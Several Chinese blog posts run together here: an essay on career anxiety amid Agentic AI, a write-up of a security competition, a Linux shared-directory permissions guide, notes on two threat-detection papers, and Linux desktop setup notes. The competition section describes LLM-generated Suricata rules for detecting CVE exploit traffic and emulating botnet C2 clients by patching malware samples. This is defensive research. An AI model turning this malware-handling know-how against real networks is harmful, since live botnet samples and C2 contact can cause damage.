这几天，我花了不少时间盯着屏幕，安静地看着 Agentic AI 在后台飞速运转。它正帮我处理着那些繁杂的工程架构和琐碎的底层代码。工作流跑得很顺畅，几乎挑不出毛病，但在屏幕前安静地端起水杯的那一刻，我心里泛起的却不是如释重负，而是一种难以名状的失重感。

坦白说，这篇文字并不是什么”破局指南”，我目前也还没有在这场剧烈的技术变革中找到完全的确定性。这只是我作为一名身处浪潮之中的博士生，一些阶段性的思考。如果你也在这场 AI 狂飙中感到过一丝迷茫，希望我的思考碎片能与你产生些许共鸣。

以前，每接触一个新技术，我都会有一百个小时死磕的冲动。那种通过一行行敲代码建立起来的肌肉记忆和技术直觉，是我作为技术人员最大的安全感来源。但现在，面对一个新任务，我的第一反应变成了”怎么拆解任务交给 Agent”。我构建工作流的技能提升了，但在某个具体领域深耕的素养却好像在不可逆地减弱。

这就引出了一个让我深思的问题：如果以后人人都是掌握 AI 的”超级个体”，连编写软件、执行任务都变得像写文章一样门槛极低，那在下一个时代，我们究竟比拼的是什么？当我们的价值只剩下”操作工具”的时候，一旦这个动作本身也不再被需要，我们的护城河在哪里？

二、紧绷的标本

为了想清楚这个问题，我反而开始回忆起过去那些让我”失去护城河”的时刻。

最近偶然看到一位博主 Ray 的分享，里面提到了一句极其反直觉的话：”只有当你放松时，好事才会发生”。他说，人在巨大的压力下，认知地图会急剧收窄，只能死死盯着眼前最紧急、最让人恐惧的事物。高压不仅不会变成动力，反而会直接拖慢学习效率，让你丧失灵活性。

这简直是我高中的真实写照。我从初中就开始自学计算机，一直自诩是个有极强自驱力的人。但回首过去，我人生中压力最大、也最缺少行动力的一段时间，恰恰是那段在小县城高中的日子。在那套崇尚极度紧绷和打压的制度下，我每天活在对小测排名、对老师抽查的恐惧中。思维像是被禁锢了，明明应该是我素养挺好的数学，成绩却始终不理想，甚至让我一度怀疑自己的智力。

那几年，我被迫变成了一个只能应对外界刺激的”反应者（Reactor）”。脑子里同时装满了无穷无尽的恐惧，有着无尽的学习任务，完全失去了主导生活的节奏。

幸运的是，上了大学之后，那种无处不在的压迫感消失了。在一个相对宽松自由的环境里，我的专业素养得到了真正的释放，顺利拿下了国奖，并以专业第一的成绩保研。这让我印证了一个底层的逻辑：我们的潜意识里好像自带一套”成功机制”，只要设定好目标，它会自发带你抵达——但前提是，你得足够放松，不能用意识去强行干预。你越紧绷，越企图控制一切，反而会把这套机制卡死。

三、击碎稻草人

现在的我，在直博第二年已经提前完成了一半的毕业指标，所在的研究组氛围也很棒，但我却时常感到一种隐秘的焦虑。

我曾经对没有出国深造感到过遗憾，向往外面更广阔的计算机教育文化，甚至一度觉得继续留在这里读直博是自己某种程度上的”躺平”。这个念头在我脑子里盘旋了很久，时不时就出来刺我一下。

直到我最近听到一句话：”不要和过去的稻草人较劲（Don’t fight the straw man out of the past）”。

我突然意识到，我对出国的执念，我对”留在国内就是妥协”的自责，其实就是我的”稻草人”。它来源于高中那几年带给我的”生存模式”后遗症——我总觉得只有不停地逃离、不停地去到一个更远的环境里证明自己，才是安全的。但我早就不在那个压抑的环境里了，我已经安全了。

重新看一下当下的处境：外面的大厂在裁员，旧的软件工程体系正在被 AI 颠覆。如果我真的只是读个硕士匆匆毕业去打工，我担心自己会一头撞进这个充满未知的旧体系中。而现在这几年的直博时光，没有极致的生存压力，有着很高的容错率——这哪里是什么躺平，这可能是我能拿到的最好的一张入场券。

让那个虚拟的稻草人倒下，系统才能为真实的当下运转。

四、难以规模化的”笨拙”

放下了执念，再回看开头那个”护城河”的焦虑，思路就顺畅多了。

我们研究所平时承担大量的重大工程，学生经常要作为承受多项目并行的压力。以前我觉得这些工程在简历上不够亮眼，大部分是脏活累活，所以才开始深度引入 Agentic AI，想从里面解脱出来。AI 确实极其高效，但随之而来的是一种成就感的剥夺——以前那种通过技术欣赏建立起来的踏实感，没了。

但换个角度想，AI 时代的护城河到底是什么？我慢慢觉得，的确是去做那些”难以被规模化”的事情。

敲几行标准代码、优化一个常规算法，这些都太容易被规模化了，AI 迟早把它们变成免费的。但是，在复杂的物理世界中推动一个工程落地，与不同的人进行真实的协作，在混乱的需求中判断出什么是真正值得做的架构——这些带着泥泞的、看起来有些”笨拙”的事情，AI 根本没法端到端地完成。

我认为未来的信息时代，比拼的肯定不再是谁能把东西“做出来”，因为 AI 永远比你做得快、做得标准。未来比拼的，是谁知道“什么才是真正的好东西”，以及“该提出什么好问题”。

AI 可以瞬间给你生成十套顶会论文的 idea，或者写出完美的工程架构，但它没有真实的人生阅历，没有踩过坑，也没有从无数次失败中提炼出的直觉。它不知道哪一个 idea 具有真正突破性的 CCF-A 级品味，不知道在复杂的物理世界和人际协作中该如何落地。品味、判断力、以及对事物“第一性”的洞察，我觉得会是未来最稀缺的素养。

所以我现在看那些工程项目的心态变了。它们可能有拖累我的琐事和负担，但我也可以拿它们做训练品味的练兵场。AI 负责把执行层面的事情干漂亮，我要拿捏方向、协调资源、在混沌中做决策，这些才是 Agent 替不了的。

五、成为发问者

我依然需要目标，但我决定不再死死盯着目标焦虑。

就像那个视频里说的，一旦设定了方向，大部分时间都应该进入一种”旅途模式（Journey Mode）”。低头看脚下的路，偶尔抬头确认方向，享受沿途的风景，而不是时刻被终点压得喘不过气来。

在这个 Agentic AI 狂飙突进的节点，我觉得要先给自己松个绑。我不再恐惧 AI 剥夺了我的成就感，相反，我心甘情愿地把执行交给它。我打算把省下来的时间，用来去跨界探索、去阅读、去散步，去慢慢培养自己对”好东西”的直觉。

不要害怕 AI 抢走了你的思考，把大脑腾出来，去负责想象、审美和发问。

我们这一代人，从小就被训练成在考卷上奋笔疾书、给出标准答案的人。但在下一个时代，解题速度已经没有意义了。放下笔，站起来，去想一想这座考场到底为什么存在，去试着向这个世界提出那个还没有人问过的好问题——我觉得，这才是我们这代人真正该开启的篇章。

赛题回顾

赛题一

赛题一要求识别漏洞利用流量中的 CVE，训练集提供了4万条 HTTP 请求以及对应的 CVE 标注，测试集为13万条 HTTP 会话。总结下来有几个关键点：a) 需要对应到流量中存在的具体 CVE，可能为一或多个；b) 提供的流量样本只包含 HTTP 请求；c) 情报时效性要求较高，最近的 CVE 编号为2025年8月公开的。

统计得到训练集样本 CVE 分布：

1
2
3
4

总样本数: 44983
标注了CVE的样本数: 11008
不同的CVE漏洞总数: 505
平均每个CVE对应的样本数: 24.85

赛题场景要求我们识别对应到具体 CVE，而学术界的方法主要是通过机器学习/深度学习模型的训练，来识别是否为恶意/属于哪种攻击，无法满足需求。因此，感觉工业界常用的规则匹配是需要着重考虑的点。

规则匹配方面，有诸多社区维护的 PoC 库或扫描器可供我们使用，例如 Goby、Nuclei、Fscan 等；知名的开源 IDS Suricata 也有官方和社区维护的不同规则库。整个赛题解题思路如下：

在本赛题中，我主要完成了 1) 设计 LLM Agent 来根据 PoC 自动化编写和验证 suricata 规则；2) 实现基于词汇表征的 URL 抽象和模板匹配；3) 寻找开源 Waf 来消除 FP。

本文着重分享前两个工作的思路。任务3是采用长亭雷池 Safeline ，借助它的攻击语义匹配能力，查找属于攻击但我们未能给出 CVE 标签的流量，然后进行一些半自动化的搜索和人工复核。

设计 LLM Agent 根据 PoC 自动化编写和验证 suricata 规则

Suricata 是一个开源的 IDS/IPS 系统，其主要基于规则签名对流量进行检测，处理性能高、社区规则较全。我们使用其官方的 ET-Open 规则集、从网络收集的其他数据集作为基础，经去重后共计6.2万条规则。

我们对这些规则做了一些预处理，以适配只有 HTTP request payload 的情况，具体包括：1) 筛选 alert http 的规则，得到2.7万条；2) 将规则签名头的IP宏去除，改为 alert http any any -> any any ，以检测所有源和目的IP；3) 确保包含 flow:established ，否则将无法正常检测数据集流量。为了使 suricata 正常检测流量，还需要将数据集中的 payload 组装为带三次握手的 TCP 报文。我们使用 python scapy 实现这一点。

然而，仅使用这些规则，只能匹配到训练集中113个 CVE 。因此我们采用 LLM Agent 的方式，对训练集的 CVE 样本进行 suricata 规则编写和验证。整体流程如下图所示：

• 提示词（基准）

  1 2 3 4 5 6 7 8 9 10 11 12 13 14

  base_prompt = ( f"You are a senior cybersecurity expert specializing in Suricata rule authoring.\n" f"Target vulnerability: {cve}.\n\n" f"Below are HTTP payload samples associated with this CVE. Some represent different variants.\n" f"Your task: Write one or MORE minimal Suricata rules to detect these variants.\n" f"- Start each rule with: alert http any any -> any any\n" f"- Include the CVE id {cve} in msg or reference so alerts are labeled with this CVE\n" f"- Only include detection-relevant fields; avoid ttp or extra metadata\n" f"- Output ALL rules inside a single triple-backtick code block, using 'suricata' as language.\n" f"- One rule per line.\n" f"- If necessary, use multiple rules to cover different patterns. Avoid overbroad patterns.\n\n" f"Samples:\n{samples_block}\n\n" f"Now output the rules only." )

• 提示词（反馈）

  1 2 3 4 5 6 7

  feedback_prompt = ( base_prompt + f"\n\nThe following pcaps were not detected by your rules ({len(uncovered)} remaining). " f"Review and ADD or ADJUST rules as needed. Re-output the full set of rules.\n" f"Current rules:\n```suricata\n{prev_rules_block}\n```\n" + (f"Additional missed payloads for reference:\n{missed_block}" if missed_block else "") )

对于每种 CVE，由于可能有多种利用特征，因此我们允许大模型提供多个规则。

最终，我们成功对训练数据集构建了351个CVE匹配规则，共计551条规则。

采用 Claude-sonnet-4.5 作为LLM后端。在训练集上测试，获得了流量级别检测率 (检测出的条数 / 总条数) = 0.3785 (8527/22527)。

基于词汇表征的 URL 抽象和模板匹配

URL 路由特征是匹配 CVE 的关键特征。尤其是在缺少 HTTP 响应内容的情况下，特征几乎只有 URL 和请求 Payload。

然而，直接使用 PoC 中提供的 URL 匹配数据集中的 URL 有两个关键缺陷：

• 一是变量完全嵌入在 URL 中，例如纯数字ID、UUID 这样的出现频率极低的字符串，直接匹配会导致大量失配。
• 二是存在 URL 编码、大小写不统一、以及末尾斜杠等归一化问题，导致简单的字符串比对完全失效。

面对海量的 WAF 告警日志，传统的基于正则（Regex）的规则维护成本过高且极易遗漏。我们需要一种能够自动学习 URL 结构，例如将 /api/v1/user/10086/profile 和 /api/v1/user/admin/profile 识别为同一类模式的算法。

为此，我们设计并实现了一种算法，想了想可以称之为：“两阶段词汇表征与模板化”算法。该方法的动机是：一个 URL 片段是“静态路由”还是“动态变量”，应由它在全局流量中出现的频率（稀有度）决定。

Phase 1: 词汇表构建

第一阶段需要遍历全量数据集，对 URL Path 按斜杠进行分词，构建一个全局的Token 词频表。引语义稀有度的概念：

• 高频词： 如 api, login, v1, user。这些词在成千上万条日志中重复出现，它们大概率是业务系统的固定路由结构。

• 低频词： 如 10086, a1b2-c3d4, admin_token_xyz。这些词往往只出现在极少数的请求中，具有极高的特异性，大概率是动态变量。

Phase 2: 模板生成

在第二阶段，我们再次遍历日志，利用 Phase 1 生成的词表对 URL 进行重构：

• 静态保留： 如果当前 Token 在词汇表中属于“高频词”或“语义关键词”，予以保留，维持其路由语义。

• 变量抹平： 如果当前 Token 是“低频词”，或者符合特定的高熵特征（如 UUID、Hash），则将其替换为统一的占位符。设计的占位符有：{NUM}、{UUID}、{HASH}、{FILE_VAR}、{VAR}。

实施构建

使用 Github 上一个比较全面的 POC 库：https://github.com/eeeeeeeeee-code/POC
为经过处理后，在测试集上拿到了3926条 path 模板：

赛题二

初探

根据提供的僵尸网络样本（ELF）与部分数据包（Pcap），分析出 C&C 通讯协议格式, 并实现一个可以跟踪 C&C 服务器下发指令的跟踪程序。

这道题我们一开始理解错了题意，以为是我们只需要逆向出协议然后写一个抓包程序，挂到赛题环境中，然后 C&C 服务器就会定时（根据题目描述来看有5个 checkpoint）给我们发送指令。

经过咨询出题人后我们纠正了思路，按僵尸网络追踪的现实应用场景来说，是需要自己模拟一个样本（C2 客户端），与 C2 服务器主动建立连接，然后抓取其下发的攻击指令。

这道题组里的二进制大佬 @Wings 很快找到了思路，发现大部分样本的框架一致（框架一），仅有 6 个 ELF 是另一种框架（框架二）。不同样本基本上只是握手时使用的 magic number 不一样，少数还含有加密密钥或者 crc 校验。

随后 @Wings 写了一套极为完整、符合大模型提示工程的 Agent 提示词模板，通过调用 IDA MCP 和 fs MCP 来自动化寻找握手所需的参数。但由于最先尝试的 LLM 底座不太行（GPT-5），导致存在大量失败，而赛题一我的方法也基本到了性能瓶颈，就根据他的指导，协助他手工逆向了一些样本。

随后我们尝试了 Claude 模型作为底座，发现 Claude-4.5-sonnet 可以较好的遵循指令并完成任务。

转机

@Wings 想到，我们已经使用样本来发送上线消息和处理握手协议，于是想到可以让命令协议也通过样本来处理，这样能够保证通信协议是完全正确的。也就是将样本进行无害化处理后，patch 掉最后执行攻击指令的函数，将攻击参数外传出来。

对网络侧、ELF侧的数据进行交叉验证，以排查潜在的解析遗漏或者错误。验证方案如下：

1. 获取ELF侧指令，以（quantized_ts, duration, target）为 key 存入缓存。由于网络侧指令往往迟于 ELF 侧指令到达，因此 quantized_ts 为 ts 向下取整到最近的 2 秒的值。
2. 网络指令到达后，延迟1.5s处理。检查是否有匹配的 ELF 侧指令，若有，则检查所有字段是否匹配。若无，则表示 ELF 侧指令缺失。
3. 若延迟后依然未收到网络指令，则表示网络侧指令缺失。
   经过交叉验证后，最终完善了全部的协议解析。

在实验室公用 Linux 服务器的多用户环境下，经常需要一个由多人平行读写执行的共享目录；兼顾可维护与最小化权限暴露。但遇到一些问题，探索后发现与 umask、sgid、目录可穿越 (x)、ACL继承都有关，暴露出自己在 Linux 运维功底方面的缺陷。特此记录，以供参考。

问题介绍

• 服务器：Linux（Debian 系）

• 需求：/proj/shared 下由多位成员协同读写代码与数据

• 现状：已创建用户组 projgrp，将成员 A、B 都加入了该组

• 问题现象：

  • 成员 A 能在 /proj/shared 写入，但成员 B 无法修改 A 创建的文件
  • A 在 /proj/shared 创建的新文件属组落在自己的主组，而不是 projgrp
  • 成员 B 登录后 cd /home/A/.../shared 报“权限不够”

经过研究，发现这些现象背后牵涉 目录执行位（x）、umask、SGID、ACL 以及 登录会话的组缓存 等机制。逐个解决后完成了需求，特此记录，以便有类似需求的读者参考。

知识回顾

• umask：仅影响新建文件/目录的权限位（如 rw-rw-r--），并不决定属组归属。

  • 常用：umask 0002 → 新文件 664，新目录 775

• 目录执行位（x）：对目录意味着“可穿越”。路径上的每一层目录都需要对访问者有 x，才能 cd 进去。

• SGID（setgid）：目录位设置 g+s 后，新建子目录一定继承父目录组；新建文件在多数本地文件系统上也会继承父目录组（更标准做法是配合 ACL 保证）。

• ACL（访问控制列表）：

  • setfacl -m ... 设置访问 ACL（立即作用于当前对象）
  • setfacl -d -m ... 设置默认 ACL（仅对将来新建的内容生效）
  • mask 条目会裁剪“命名用户/组”的有效权限（常见坑点）

根因剖析

1. 路径上某层目录缺少执行位 x
   例：成员 B 需要穿越 /home/A 才能进入共享子目录，若 /home/A 对组没有 x，即使目标目录权限正确也进不去。

2. 仅设置了组与权限，未设置 SGID
   结果：在共享目录中新建的文件仍归属用户的主组，而非协作组。

3. 只在顶层目录设置了默认 ACL，子目录未继承
   结果：深层子目录中新建的文件不带默认 ACL，仍不可写。

4. ACL 的 mask 把有效权限裁剪掉
   看到 #effective: r--/rw- 等提示，说明默认/访问 ACL 被 mask 限制。

5. 用户会话未刷新组列表
   刚把用户加入协作组，当前 TTY/SSH 会话仍在用旧组缓存；需要重新登录或用 newgrp。

6. 文件系统或挂载选项未启用 ACL
   某些发行版或挂载方式需要显式 acl 选项。

解决方案

1) 组与顶层权限初始化

1
2
3
4
5
6
7
8
9
10

# 创建协作组
sudo groupadd projgrp

# 将成员加入组（示例：userA 与 userB）
sudo usermod -aG projgrp userA
sudo usermod -aG projgrp userB

# 共享目录属组与基本权限
sudo chgrp -R projgrp /proj/shared
sudo chmod 2775 /proj/shared           # rwxrwsr-x（含 SGID）

2775 的 2 即 SGID；s 确保目录树中的新建内容倾向继承协作组。

2) 仅允许“穿越”上层私有目录

若共享目录位于某个私有家目录下（如 /home/userA/shared），给协作组一个最小的穿越权限：

1
2

# 仅允许组穿越（不可列目录），保护家目录隐私
sudo setfacl -m g:projgrp:--x /home/userA

不用把 /home/userA 改成 755；--x 足以穿过而看不到其他文件。

3) 递归设置 SGID + 访问 ACL + 默认 ACL

关键：对子目录也必须生效，因此做递归设置：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

DIR=/proj/shared
GRP=projgrp

# 确保整个目录树属组正确
sudo chgrp -R "$GRP" "$DIR"

# 给所有目录设置 rwxrwsr-x（含 SGID）
sudo find "$DIR" -type d -exec chmod 2775 {} +

# 访问 ACL：让协作组在现有内容上有 rwx
sudo setfacl -R -m g:$GRP:rwx,m::rwx "$DIR"

# 默认 ACL：让将来新建的内容自动带组 rwx（以及放开 mask）
sudo setfacl -dR -m g:$GRP:rwx,m::rwx "$DIR"

m::rwx 是 ACL 的 mask，不放开会“剪掉”有效权限，导致组写权限实测无效。

4) 成员 umask 设置

协作成员的 umask 设为 0002（常见 shell 的 ~/.zshrc、~/.bashrc）：

1

umask 0002

这确保新建文件是 664，目录是 775，符合“组可写”的协作预期。
注意：umask 不控制属组；属组继承依赖 SGID/ACL。

5) 刷新用户会话的组上下文

将成员加入协作组后，需要重新登录或临时执行：

1

newgrp projgrp

newgrp 会以该组为有效组启动一个子 shell，退出即可回到原会话。

验证

顶层目录必须具备 s 权限位

1
2

ls -ld /proj/shared
# 期待：drwxrwsr-x ... root projgrp ...

ACL 应包含默认与 mask

1
2
3
4
5

getfacl /proj/shared
# 期待含：
# group:projgrp:rwx
# default:group:projgrp:rwx
# default:mask::rwx

新建文件/目录测试

1
2
3
4

# 模拟成员 B 的新会话测试
sudo -u userB bash -lc 'umask 0002; touch /proj/shared/t.new; mkdir -p /proj/shared/subdir'
ls -l /proj/shared/t.new /proj/shared/subdir
# 期待：属组为 projgrp；文件 664，目录 775

总结

在多人协作的公用服务器上，实现“等权共享目录”并不复杂，但需要系统性处理：

• 路径可穿越（x）
• SGID 保证组继承
• ACL（含 mask）保证权限一致性
• umask 做默认位的兜底
• 会话刷新确保新组即时生效

基本信息

• 发表: CCS 23’
• 图学习类别: 图学习+嵌入向量库
• 数据集: Darpa E3
• 方法分类: 图级别, 威胁狩猎
• DOI：10.1145/3576915.3623187

引言

在庞大的历史系统日志仓库中高效搜索已知攻击行为，是一个研究较少但对威胁狩猎实践具有关键影响的问题。

在溯源分析的背景下，这要求将外部观察到的威胁行为转换为可在系统级溯源图中进行搜索的查询[53, 61, 74, 87]。这个问题设置确实可以视为图蕴含（子图匹配）问题的一个实例。

Challenge4：查询图与溯源图粒度不对齐的问题

• 感觉梳理的很好：
  • 抽象层级不匹配 (Mismatch in Abstraction Levels)
    • 查询图通常是高度概括的。例如，查询图里可能只用一个“浏览器进程”来描述攻击步骤。但在实际的溯源图中，这个“浏览器进程”可能对应的是主进程的一个克隆进程、一个由启动器创建的子进程，或者是具体的某个浏览器（如Firefox、Chrome。这种从概念到具体实现的差异，造成了匹配困难。
  • 结构性差异 (Structural Differences)
    • 溯源图中可能包含查询图里没有的额外中间步骤，或者因为日志记录不全而缺失了某些事件。
    • 攻击者为了躲避检测，可能会故意省略、替换或增加一些攻击步骤，这导致实际的攻击图（在溯源图中）与分析师预设的查询图在结构上不完全一致。
  • 实体歧义性 (Entity Ambiguity)
    • 查询中的实体可能存在歧义。例如，两个同名的文件在不同应用程序的上下文中可能扮演完全不同的角色。如果查询不够具体，就很难在庞大的溯源图中精确定位到目标实体。
      为了应对这些挑战，必须让模型具备一定的鲁棒性，能够容忍这些差异，从而在不完全匹配的情况下也能成功识别出威胁行为。

方法

我们的技术采用了一种图表示学习方法，使大部分搜索计算可以离线进行，并在查询时执行一个轻量级的比较步骤。在图缩减方面，进行了以进程为中心的划分，同时结合图版本控制以整合时序信息。

我们采用顺序嵌入，这使得在嵌入空间中通过对这些表示进行坐标-wise 排序，能够在学习层次化实体表示的同时保持层次结构。

工作的主要贡献：

• 一种图简化策略，能够在保留溯源图中多样行为特征的同时，促进有效的学习和搜索能力。

• 利用顺序嵌入以在嵌入空间中高效评估子图关系。

• 一种通用的搜索方法，不仅不偏重于攻击行为，还可推广以识别任何类型的行为。

• 由于子图表示的紧凑性和溯源图的简化，能够高效地搜索大量历史日志数据。

• 相比其他假设驱动的威胁狩猎方法，显著降低了误匹配率并提高了准确性。

图缩减策略

总体

这些操作包括移除与管道和内存访问相关的非必要节点和边，将克隆进程与其父进程合并，并按时间间隔合并网络通信事件。每个描述唯一系统实体的节点随后被分配到一个抽象类中，该抽象类描述更高层次的分类，例如系统文件、用户应用程序进程等。（先前研究常用，[72,74]）

在简化图之后，下一步是为节点进行版本化，这将时间信息纳入图中，以防止节点间出现虚假的信息流动。

在最后一步，图被划分为重叠的子图，通过提取每个进程节点的k跳自环图来实现。此处，k也表示用于获取子图表示的GNN层数。我们随后通过迭代标签传播（第4.1.4节）对抽象后的自环图进行另一层的缩减，以去除重复行为。这样每个子图中便保留了独特的特征，作为子图关系的一部分进行学习。

图简化

• 线程处理：将线程合并到其父进程之中、将clone出来的进程节点合并到原节点。
• 捕捉远程服务器行为随时间变化：将每个远程IP和端口组合视为一个独立的源，并在10分钟的时间窗口内进行处理。[29]
• 层次/标准化：根据每个实体在文件系统中的根目录分配类别标签。

缓解依赖爆炸

• 图版本化：确保所有路径的边具有单调递增的时间戳值，从而保留事件的因果顺序。
• 将一些特定节点指定为汇聚节点：解决图神经网络中的过度平滑问题。

评估

1. 图缩减效果

2. 在 E3 数据集上评估与同类工作的威胁狩猎效果

总结

这篇文章主要是在查询图与溯源图粒度不对齐问题方面的梳理非常全面，在图划分、图缩减方面的算法描述也非常详细，希望有时间再来回顾和学习一下。

ShadowKube 将行为监控与影子蜜罐相结合，有效检测和中和异常行为。通过建立行为基线以识别偏差，并将被攻陷的节点转换为蜜罐，从而隔离并捕获攻击者，从而减轻其造成的威胁。最近最这篇文章进行了学习，并基于自己的理解，整理了简单而非详细的阅读报告。

同时提供了一个scholar site：https://sites.google.com/view/shadowkube

背景

攻击者通常利用集群配置错误或集群应用程序中的漏洞来获取提升的权限，例如创建容器的能力。借助这些权限，他们部署大量受其控制的恶意资源，包括嵌入后门或加密货币挖矿恶意软件的容器。

现有局限

针对 API Server 的攻击不直接攻击应用容器，因此网络层面的检测难以生效，需要有效的行为监控方式。

现有的行为监控方式：

• 基于规则：例如 Falco，可以通过符号链接等技术绕过。
• 基于机器学习：有的是通过API调用行为建模来检测，但受正常的突发访问的影响。

现有研究主要侧重于通过应用静态策略来监控和防止异常行为。这种方法需要大量的规则维护，并且容易受到攻击者的规避。

本文采用行为基线来识别Kubernetes集群中的异常，并利用蜜罐技术诱骗攻击者。受移动目标防御（MTD）和影子蜜罐概念的启发，我们提出了ShadowKube。

主要贡献

1. 算法设计。我们开发了一种基线算法，利用最长公共子序列（LCS）和Levenshtein距离来建立容器的规范性良性行为，并量化容器运行时的异常情况。
2. 系统实现。我们实现了ShadowKube，一个利用影子诱饵主机的主动防御框架，用于Kubernetes安全。它在不被攻击者察觉的情况下，将异常容器和主机转化为诱饵主机，从而实现诱捕和防御。
3. 全面评估。我们进行了实验以测试ShadowKube检测异常的能力、诱捕效率以及评估其性能影响。系统证明其能够以最小的开销快速识别并隔离集群中的异常行为。它将受影响区域连接到影子集群以实现有效的防御。在一个月的公网部署期间，ShadowKube共吸引了635次真实攻击。

设计

系统包括五个组件：流量代理、探针、检测器、执行器和影子集群。

监控的数据指标：文件访问、网络连接、命令执行。

基线行为采集阶段

鉴于Pod集合的动态性，正常活动可能并不总是在特定的Pod中发生，而是在其副本中进行。ShadowKube通过根据其元数据将行为分类为不同的组，为每个组单独确立良性行为基线。

最小有效序列长度、最长公共子序列

对于文件和命令操作：在多个观察到的行为中找到最长的共同子序列，以总结正常模式

检测阶段

通过为每个时间窗口计算累积怀疑分数，可以有效识别与既定行为基线的偏差，突出 Kubernetes 集群环境中的潜在安全威胁或异常。→ 和一些溯源图的方法例如Kairos思路有点像

对于文件访问、命令执行、网络进行单独的怀疑分数确定，核心就是Levenshtein距离。

策略执行阶段

包括网络重构、Pod 清理和敏感信息修改。

Pod 的原位转换可能导致单个节点与控制平面断开连接，从而引起怀疑。为此，我们构建一个影子集群，旨在动态地与转换后的Pod集成，从而构建出一个表面上正常的运行环境。

• 网络：通过iptables实现，当对生产服务发起API调用时，将目标节点上正在进行的进程重定向到影子集群。

  正常用户的访问是否会受到影响？

• Pod 清理：为保护目标节点上的其他 Pod 不被破坏，所有除被破坏的 Pod 之外的 Pod 都会被移除。后，生产集群会通知在其他节点上重新创建这些 Pod，从而保持服务的连续性。

• 敏感信息修改：替换例如服务账户令牌及其他对生产环境中访问Kubernetes API进行认证和授权至关重要的Kubernetes凭证。

思考

• 敏感信息修改是否能直接用ebpf hook;
• 由于云服务的无状态性，能否基于用户指纹（例如Cookie）而非来源IP来track用户，以此实现例如横向移动探测的目的？

知识补充

K8s 知识点

• 每个 Pod 包含一个或多个共享网络和存储资源的容器。

这篇博客只是对自己的配置做简单记录，从 Notion 上拷贝下来的，随时更新。

基本情况

• Linux 使用经验：8年左右，之前使用 Linux 主要用来配置服务器，具有一定的运维经验。
• 显示协议： Wayland
• 桌面环境： Gnome
• GPU： Nvidia + Intel

Part1：可视化

文字相关

字体大小

经过测试，对于27寸4K显示器，在使用 Gnome（Wayland）时采用全域 HIDPI 缩放 150%+字体 1.25 倍时取得的显示效果是最舒服的，参考指标为 Mac 在同样显示器上的效果。

设置全域HIDPI缩放：

gsettings set org.gnome.mutter experimental-features '["scale-monitor-framebuffer", "xwayland-native-scaling"]’

设置1.25倍字体并开机生效：
gsettings set org.gnome.desktop.interface text-scaling-factor 1.25

Apple 风格 Emoji 显示

首先安装字体：yay ttf-apple-emoji 之后应该就能正常显示了。

对于 emoji 选择的问题，可以直接在 fcitx5 输入法中输入 emoji 名称（中英文均可），也可以安装一个 picker：pacman -S gnome-characters，然后自己绑定一个快捷键。

CJK 字体设定

默认来说 Noto 或者Adwaita 字体系列是有 CJK 支持的，但在高分辨率显示器上感觉中文还是不够平滑和锐利。经过对 ChatGPT 推荐字体的测试，感觉 HarmonyOS Sans SC 字体（即鸿蒙字体）还不错，我们来为 CJK 单独设置为该字体。

首先安装 ttf-harmonyos-sans (aur)。随后创建配置文件 mkdir -p ~/.config/fontconfig/conf.d， 新建一个字体配置文件 ~/.config/fontconfig/conf.d/65-harmonyos-cjk.conf，写入如下配置：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

<?xml version="1.0"?>
<!DOCTYPE fontconfig SYSTEM "urn:fontconfig:fonts.dtd">
<fontconfig>
  <!-- 通用平滑设置 -->
  <match target="font">
    <edit name="antialias" mode="assign"><bool>true</bool></edit>
    <edit name="hinting" mode="assign"><bool>true</bool></edit>
    <edit name="hintstyle" mode="assign"><const>hintslight</const></edit>
    <edit name="rgba" mode="assign"><const>rgb</const></edit>
  </match>

  <!-- 仅中文语言优先使用 HarmonyOS Sans -->
  <match target="pattern">
    <test name="lang" compare="contains"><string>zh</string></test>
    <edit name="family" mode="prepend">
      <string>HarmonyOS Sans SC</string>
    </edit>
  </match>

  <!-- 全局 sans-serif 不放 HarmonyOS Sans，只保留英文默认 -->
  <alias>
    <family>sans-serif</family>
    <prefer>
      <family>Noto Sans</family>
      <family>Noto Sans CJK SC</family>
      <family>Source Han Sans SC</family>
    </prefer>
  </alias>
</fontconfig>

保存后刷新字体缓存 fc-cache -fv，并重启 Gnome Shell。使用 fc-match 检查中英文字体情况，应当显示：

1
2
3
4
5
6

❯ fc-match :lang=en
NotoSans-Regular.ttf: "Noto Sans" "Regular"

❯ fc-match :lang=zh
HarmonyOS_SansSC_Regular.ttf: "HarmonyOS Sans SC" "Regular"

视觉效果增强

模糊效果

yay -S gnome-shell-extension-blur-my-shell(remember to reboot),

then go to the extensions and activate blur-my-shell,

go to the settings and turn on the “applications blur”,

finally, turn on “enable all by default”, and then turn off “opaque focused window”.

now you get a blur and transparent terminal.

显示驱动

https://wiki.archlinuxcn.org/wiki/硬件视频加速

Part2：外设

显示器

亮度调节

yay ddccontrol-db

蓝牙

• 根据型号寻找驱动，一般会有PID/VID：https://oemdrivers.com/bluetooth-ugreen-bluetooth-5-0-adapter
• 查看当前内核支持的设备ID：[https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/bluetooth/btusb.c?h=v6.15.9](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/bluetooth/btusb.c?h=v6.15.9

Part3：软件及功能

1. 屏幕截图和标注：sudo pacman -S flameshot

   安装并绑定命令为 flameshot gui 的快捷键后，可能发现无法正常截图。参考了这个讨论：https://github.com/flameshot-org/flameshot/issues/3446#issuecomment-1931292685

   按他的方法创建一个脚本，然后快捷键执行这个 sh 即可正常截图。

   1 2	#!/bin/sh /usr/bin/flameshot gui

2. 屏幕录制：gnome自带 ctrl+shift+alt+r，功能挺齐全的

3. flameshot

   NVIDIA显卡用户注意：在最新版本的 Webkit2Gtk (2.42.0) 中，由于 Nvidia 专有驱动未完全实现 DMABUF，将导致无法启动和崩溃的情况发生。请降级或在 /etc/environment （或者其他设置环境变量的地方）中加入 WEBKIT_DISABLE_DMABUF_RENDERER=1 环境变量关闭 DMABUF 的使用。

4. 屏幕录制：sudo pacman -S kooha

5. nVidia on Wayland 中 Gnome Video Failed to initialized OpenGL with Gtk：

   ~/.config/environment.d/gdk.conf 中添加：

   GDK_GL=gles

Part4：网络

DNS

/etc/systemd/resolved.conf

resolvectl status

sudo systemctl restart systemd-resolved

DHCP(SERVER）

让虚拟机通过 NAT 访问指定网段 10.0.0.0/8

sudo iptables -A FORWARD -i br0 -o enp0s31f6 -d 10.0.0.0/8 -j ACCEPT
sudo iptables -A FORWARD -i enp0s31f6 -o br0 -m state –state RELATED,ESTABLISHED -j ACCEPT
